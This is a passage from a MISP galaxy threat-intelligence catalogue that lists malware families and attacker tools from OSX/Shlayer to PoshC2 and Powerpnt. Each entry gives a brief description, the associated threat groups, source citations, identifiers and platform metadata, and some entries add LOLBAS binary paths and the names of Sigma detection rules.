UUID a45904b5-0ada-4567-be4c-947146c7f574 which can be used as unique global reference for OSX_OCEANLOTUS.D in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0352
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

OSX/Shlayer

OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.[Carbon Black Shlayer Feb 2019][Intego Shlayer Feb 2018]

Internal MISP references

UUID 4d91d625-21d8-484a-b63f-0a3daa4ed434 which can be used as unique global reference for OSX/Shlayer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0402
source MITRE
type ['malware']

Out1

Out1 is a remote access tool written in Python and used by MuddyWater since at least 2021.[Trend Micro Muddy Water March 2021]

Internal MISP references

UUID 273b1e8d-a23d-4c22-8493-80f3d6639352 which can be used as unique global reference for Out1 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0594
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

OutSteel

OutSteel is a file uploader and document stealer developed with the scripting language AutoIT that has been used by Ember Bear since at least March 2021.[Palo Alto Unit 42 OutSteel SaintBot February 2022]

Internal MISP references

UUID 042fe42b-f60e-45e1-b47d-a913e0677976 which can be used as unique global reference for OutSteel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1017
source MITRE
tags ['8bf128ad-288b-41bc-904f-093f4fdde745', '4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']
Related clusters

To see the related clusters, click here.

OwaAuth

OwaAuth is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by Threat Group-3390. [Dell TG-3390]

Internal MISP references

UUID 6d8a8510-e6f1-49a7-b3a5-bd4664937147 which can be used as unique global reference for OwaAuth in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0072
source MITRE
type ['malware']

P2P ZeuS

P2P ZeuS is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. [Dell P2P ZeuS]

Internal MISP references

UUID 916f8a7c-e487-4446-b6ee-c8da712a9569 which can be used as unique global reference for P2P ZeuS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0016
source MITRE
type ['malware']

P8RAT

P8RAT is a fileless malware used by menuPass to download and execute payloads since at least 2020.[Securelist APT10 March 2021]

Internal MISP references

UUID 1933ad3d-3085-4b1b-82b9-ac51b440e2bf which can be used as unique global reference for P8RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0626
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Pacu

Pacu is an open-source AWS exploitation framework. The tool is written in Python and publicly available on GitHub.[GitHub Pacu]

Internal MISP references

UUID e90eb529-1665-5fd7-a44e-695715e4081b which can be used as unique global reference for Pacu in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS']
software_attack_id S1091
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'e81ba503-60b0-4b64-8f20-ef93e7783796', 'a2e000da-8181-4327-bacd-32013dbd3654', '2e5f6e4a-4579-46f7-9997-6923180815dd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96']
type ['tool']
Related clusters

To see the related clusters, click here.

Pandora

Pandora is a multistage kernel rootkit with backdoor functionality that has been in use by Threat Group-3390 since at least 2020.[Trend Micro Iron Tiger April 2021]

Internal MISP references

UUID 320b0784-4f0f-46ea-99e9-c34bfcca1c2e which can be used as unique global reference for Pandora in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0664
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Pasam

Pasam is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Pasam May 2012]

Internal MISP references

UUID 3f018e73-d09b-4c8d-815b-8b2c8faf7055 which can be used as unique global reference for Pasam in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0208
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Pass-The-Hash Toolkit

Pass-The-Hash Toolkit is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. [Mandiant APT1]

Internal MISP references

UUID 8d007d52-8898-494c-8d72-354abd93da1e which can be used as unique global reference for Pass-The-Hash Toolkit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0122
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

PasswordFox

PasswordFox is a tool used to recover passwords from Firefox web browser.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID e12e1de8-a0d9-4602-8264-5952106bd53c which can be used as unique global reference for PasswordFox in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5037
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

P.A.S. Webshell

P.A.S. Webshell is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.[ANSSI Sandworm January 2021]

Internal MISP references

UUID 4d79530c-2fd9-4438-a8da-74f42119695a which can be used as unique global reference for P.A.S. Webshell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S0598
source MITRE
tags ['311abf64-a9cc-4c6a-b778-32c5df5658be']
type ['malware']
Related clusters

To see the related clusters, click here.

Pay2Key

Pay2Key is ransomware written in C++ that has been used by Fox Kitten since at least July 2020, including in campaigns against Israeli companies. Pay2Key has been paired with a leak site that displays stolen sensitive information to further pressure victims into paying.[ClearSky Fox Kitten February 2020][Check Point Pay2Key November 2020]

Internal MISP references

UUID 9aa21e50-726e-4002-8b7b-75697a03eb2b which can be used as unique global reference for Pay2Key in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0556
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

Pcalua

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Program Compatibility Assistant

Author: Oddvar Moe

Paths: * C:\Windows\System32\pcalua.exe

Resources: * https://twitter.com/KyleHanslovan/status/912659279806640128

Detection: * Sigma: proc_creation_win_lolbin_pcalua.yml[Pcalua.exe - LOLBAS Project]

Internal MISP references

UUID 00daafc4-8bf1-4447-b24f-1580263124f5 which can be used as unique global reference for Pcalua in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5137
source Tidal Cyber
tags ['074533ec-e14a-4dc3-98ae-c029904e3d6d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

PCHunter

PCHunter is a tool used to enable advanced task management, including for system processes and kernels.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 591acc39-1218-4710-aadc-150ae6475ee3 which can be used as unique global reference for PCHunter in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5038
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

PcShare

PcShare is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.[Bitdefender FunnyDream Campaign November 2020][GitHub PcShare 2014]

Internal MISP references

UUID 71eb2211-39aa-4b89-bd51-9dcabd363149 which can be used as unique global reference for PcShare in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1050
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['tool']

Pcwrun

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Program Compatibility Wizard

Author: Oddvar Moe

Paths: * C:\Windows\System32\pcwrun.exe

Resources:
* https://twitter.com/pabraeken/status/991335019833708544
* https://twitter.com/nas_bench/status/1535663791362519040

Detection: * Sigma: proc_creation_win_lolbin_pcwrun_follina.yml[Pcwrun.exe - LOLBAS Project]

Internal MISP references

UUID 7babb537-ec29-425a-9108-43d1619e02b5 which can be used as unique global reference for Pcwrun in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5138
source Tidal Cyber
tags ['62496b72-7820-4512-b3f9-188464bb8161', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Pcwutl

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft HTML Viewer

Author: LOLBAS Team

Paths:
* c:\windows\system32\pcwutl.dll
* c:\windows\syswow64\pcwutl.dll

Resources:
* https://twitter.com/harr0ey/status/989617817849876488
* https://windows10dll.nirsoft.net/pcwutl_dll.html

Detection:
* Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/
* Sigma: proc_creation_win_rundll32_susp_activity.yml[Pcwutl.dll - LOLBAS Project]

Internal MISP references

UUID 47ba2c2c-b4f3-48dc-878f-b8cab6d97f65 which can be used as unique global reference for Pcwutl in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5193
source Tidal Cyber
tags ['ff5c357e-6b9b-4ef3-a7ed-e5d4c0091c0c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Peirates

Peirates is a post-exploitation framework for Kubernetes that focuses on gathering service account tokens for lateral movement and privilege escalation. The tool is written in Go and publicly available on GitHub.[Peirates GitHub]

Internal MISP references

UUID 52a19c73-2454-4893-8f84-8d05c37a9472 which can be used as unique global reference for Peirates in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
software_attack_id S0683
source MITRE
tags ['2e5f6e4a-4579-46f7-9997-6923180815dd', '4fa6f8e1-b0d5-4169-8038-33e355c08bde', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96']
type ['tool']
Related clusters

To see the related clusters, click here.

Penquin

Penquin is a remote access trojan (RAT) with multiple versions used by Turla to target Linux systems since at least 2014.[Kaspersky Turla Penquin December 2014][Leonardo Turla Penquin May 2020]

Internal MISP references

UUID 951fad62-f636-4c01-b924-bb0ce87f5b20 which can be used as unique global reference for Penquin in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0587
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Peppy

Peppy is a Python-based remote access Trojan, active since at least 2012, with similarities to Crimson.[Proofpoint Operation Transparent Tribe March 2016]

Internal MISP references

UUID 1f080577-c002-4b49-a342-fa70983c1d58 which can be used as unique global reference for Peppy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0643
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Pester

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used as part of PowerShell Pester

Author: Oddvar Moe

Paths:
* c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
* c:\Program Files\WindowsPowerShell\Modules\Pester*\bin\Pester.bat

Resources:
* https://twitter.com/Oddvarmoe/status/993383596244258816
* https://twitter.com/st0pp3r/status/1560072680887525378

Detection: * Sigma: proc_creation_win_lolbin_pester_1.yml[Pester.bat - LOLBAS Project]

Internal MISP references

UUID 5028ed72-8e6b-48bd-b4f4-e42df926893d which can be used as unique global reference for Pester in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5264
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Phobos Ransomware

This object represents a collection of MITRE ATT&CK® Techniques associated with Phobos ransomware binaries, as highlighted in sources such as joint Cybersecurity Advisory AA24-060A.[U.S. CISA Phobos February 29 2024]

Internal MISP references

UUID d7015696-0aa1-4c13-a0e6-b9d8e027dabf which can be used as unique global reference for Phobos Ransomware in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5279
source Tidal Cyber
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

PHOREAL

PHOREAL is a signature backdoor used by APT32. [FireEye APT32 May 2017]

Internal MISP references

UUID fd63cec1-9f72-4ed0-9926-2dbbb3d9cead which can be used as unique global reference for PHOREAL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0158
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Pikabot


Pikabot is a malware first observed in early 2023 that has downloader/dropper and backdoor functionality. Researchers observed Pikabot distribution increase following the disruption of the QakBot botnet by authorities in August 2023. Originally distributed via spam email campaigns, researchers observed the threat actor TA577 (previously known for distributing payloads including QakBot, IcedID, SystemBC, and Cobalt Strike) distributing Pikabot starting in December 2023.[Malwarebytes Pikabot December 15 2023]

Internal MISP references

UUID d2a226a2-ffa1-4bb0-a090-96dc42f9c84c which can be used as unique global reference for Pikabot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5265
source Tidal Cyber
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Pillowmint

Pillowmint is a point-of-sale malware used by FIN7 designed to capture credit card information.[Trustwave Pillowmint June 2020]

Internal MISP references

UUID db5d718b-1344-4aa2-8e6a-54e68d8adfb1 which can be used as unique global reference for Pillowmint in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0517
source MITRE
tags ['6c6c0125-9631-4c2c-90ab-cfef374d5198']
type ['malware']
Related clusters

To see the related clusters, click here.

PinchDuke

PinchDuke is malware that was used by APT29 from 2008 to 2010. [F-Secure The Dukes]

Internal MISP references

UUID ba2208c8-5e1e-46cd-bef1-ffa7a2be3be4 which can be used as unique global reference for PinchDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0048
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Ping

Ping is an operating system utility commonly used to troubleshoot and verify network connections. [TechNet Ping]

Internal MISP references

UUID 4ea12106-c0a1-4546-bb64-a1675d9f5dc7 which can be used as unique global reference for Ping in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0097
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

PingCastle

PingCastle is a tool that can be used to enumerate Active Directory and map trust relationships. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.[U.S. CISA BianLian Ransomware May 2023]

Internal MISP references

UUID 1debf242-3c91-4bdb-932c-27d61fe17474 which can be used as unique global reference for PingCastle in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5003
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

PingPull

PingPull is a remote access Trojan (RAT) written in Visual C++ that has been used by GALLIUM since at least June 2022. PingPull has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.[Unit 42 PingPull Jun 2022]

Internal MISP references

UUID 4360cc62-7263-48b2-bd2a-a7737563545c which can be used as unique global reference for PingPull in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1031
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

PipeMon

PipeMon is a multi-stage modular backdoor used by Winnti Group.[ESET PipeMon May 2020]

Internal MISP references

UUID 92744f7b-9f1a-472c-bae0-2d4a7ce68bb4 which can be used as unique global reference for PipeMon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0501
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Pisloader

Pisloader is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by APT18 and is similar to another malware family, HTTPBrowser, that has been used by the group. [Palo Alto DNS Requests]

Internal MISP references

UUID 14e65c5d-5164-41a3-92de-67fdd1d529d2 which can be used as unique global reference for Pisloader in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0124
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Pktmon

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Captures network packets on Windows 10 with the October 2018 Update or later.

Author: Derek Johnson

Paths:
* c:\windows\system32\pktmon.exe
* c:\windows\syswow64\pktmon.exe

Resources: * https://binar-x79.com/windows-10-secret-sniffer/

Detection:
* Sigma: proc_creation_win_lolbin_pktmon.yml
* IOC: .etl files found on system[Pktmon.exe - LOLBAS Project]

Internal MISP references

UUID 0b0ae21a-987c-44c5-93db-3b228544eb99 which can be used as unique global reference for Pktmon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5139
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

PLAINTEE

PLAINTEE is a malware sample that has been used by Rancor in targeted attacks in Singapore and Cambodia. [Rancor Unit42 June 2018]

Internal MISP references

UUID 9445f18a-a796-447a-a35f-94a9fb72411c which can be used as unique global reference for PLAINTEE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0254
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

PLEAD

PLEAD is a remote access tool (RAT) and downloader used by BlackTech in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.[TrendMicro BlackTech June 2017][JPCert PLEAD Downloader June 2018] PLEAD has also been referred to as TSCookie, though more recent reporting indicates likely separation between the two. PLEAD was observed in use as early as March 2017.[JPCert TSCookie March 2018][JPCert PLEAD Downloader June 2018]

Internal MISP references

UUID 9a890a85-afbe-4c35-a3e7-1adad481bdf7 which can be used as unique global reference for PLEAD in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0435
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Plink

Plink is a tool used to automate Secure Shell (SSH) actions on Windows.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 6117e2b5-140b-49d2-89b7-76d91e6c798c which can be used as unique global reference for Plink in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5041
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'a1427c89-2ebd-440f-b7e0-9728e3ef2096', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

PlugX

PlugX is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.[Lastline PlugX Analysis][FireEye Clandestine Fox Part 2][New DragonOK][Dell TG-3390]

Internal MISP references

UUID 070b56f4-7810-4dad-b85f-bdfce9c08c10 which can be used as unique global reference for PlugX in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0013
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

pngdowner

pngdowner is malware used by Putter Panda. It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and-execute" utility. [CrowdStrike Putter Panda]

Internal MISP references

UUID 95c273d2-3081-4cb5-8d41-37eb4e90264d which can be used as unique global reference for pngdowner in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0067
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Pnputil

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used for installing drivers

Author: Hai vaknin (lux)

Paths: * C:\Windows\system32\pnputil.exe

Resources: None Provided

Detection: * Sigma: proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml[Pnputil.exe - LOLBAS Project]

Internal MISP references

UUID dd1e8b57-4900-4823-b194-1526c1e00099 which can be used as unique global reference for Pnputil in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5140
source Tidal Cyber
tags ['6d924d43-5de3-45de-8466-a8c47a5b9e68', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

PoetRAT

PoetRAT is a remote access trojan (RAT) that was first identified in April 2020. PoetRAT has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. PoetRAT derived its name from references in the code to poet William Shakespeare. [Talos PoetRAT April 2020][Talos PoetRAT October 2020][Dragos Threat Report 2020]

Internal MISP references

UUID 79b4f277-3b18-4aa7-9f96-44b35b23166b which can be used as unique global reference for PoetRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0428
source MITRE
type ['malware']

PoisonIvy

PoisonIvy is a popular remote access tool (RAT) that has been used by many groups.[FireEye Poison Ivy][Symantec Elderwood Sept 2012][Symantec Darkmoon Aug 2005]

Internal MISP references

UUID 1d87a695-7989-49ae-ac1a-b6601db565c3 which can be used as unique global reference for PoisonIvy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0012
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

PolyglotDuke

PolyglotDuke is a downloader that has been used by APT29 since at least 2013. PolyglotDuke has been used to drop MiniDuke.[ESET Dukes October 2019]

Internal MISP references

UUID 3b7179fa-7b8b-4068-b224-d8d9c642964d which can be used as unique global reference for PolyglotDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0518
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Pony

Pony is credential-stealing malware, though it has also been used by adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 was leaked online, leading to its use by various threat actors.[Malwarebytes Pony April 2016]

Internal MISP references

UUID 555b612e-3f0d-421d-b2a7-63eb2d1ece5f which can be used as unique global reference for Pony in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0453
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']

POORAIM

POORAIM is a backdoor used by APT37 in campaigns since at least 2014. [FireEye APT37 Feb 2018]

Internal MISP references

UUID 1353d695-5bae-4593-988f-9bd07a6fd1bb which can be used as unique global reference for POORAIM in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0216
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

PoshC2

PoshC2 is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.[GitHub PoshC2]

Internal MISP references

UUID a3a03835-79bf-4558-8e80-7983aeb842fb which can be used as unique global reference for PoshC2 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0378
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['tool']
Related clusters

To see the related clusters, click here.

POSHSPY

POSHSPY is a backdoor that has been used by APT29 since at least 2015. It appears to serve as a secondary backdoor, used if the actors lose access to their primary backdoors. [FireEye POSHSPY April 2017]

Internal MISP references

UUID b92f28c4-cbc8-4721-ac79-2d8bdf5247e5 which can be used as unique global reference for POSHSPY in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0150
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

PowerDuke

PowerDuke is a backdoor that was used by APT29 in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. [Volexity PowerDuke November 2016]

Internal MISP references

UUID d9e4f4a1-dd41-424e-986a-b9a39ebea805 which can be used as unique global reference for PowerDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0139
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

PowerLess

PowerLess is a PowerShell-based modular backdoor that has been used by Magic Hound since at least 2022.[Cybereason PowerLess February 2022]

Internal MISP references

UUID 8b9159c1-db48-472b-9897-34325da5dca7 which can be used as unique global reference for PowerLess in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1012
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Power Loader

Power Loader is modular code sold on the cybercrime market and used as a downloader in malware families such as Carberp, Redyms and Gapz. [MalwareTech Power Loader Aug 2013] [WeLiveSecurity Gapz and Redyms Mar 2013]

Internal MISP references

UUID 018ee1d9-35af-49dc-a667-11b77cd76f46 which can be used as unique global reference for Power Loader in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0177
source MITRE
type ['malware']

Powerpnt

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft Office binary.

Author: Reegun J (OCBC Bank)

Paths:
* C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
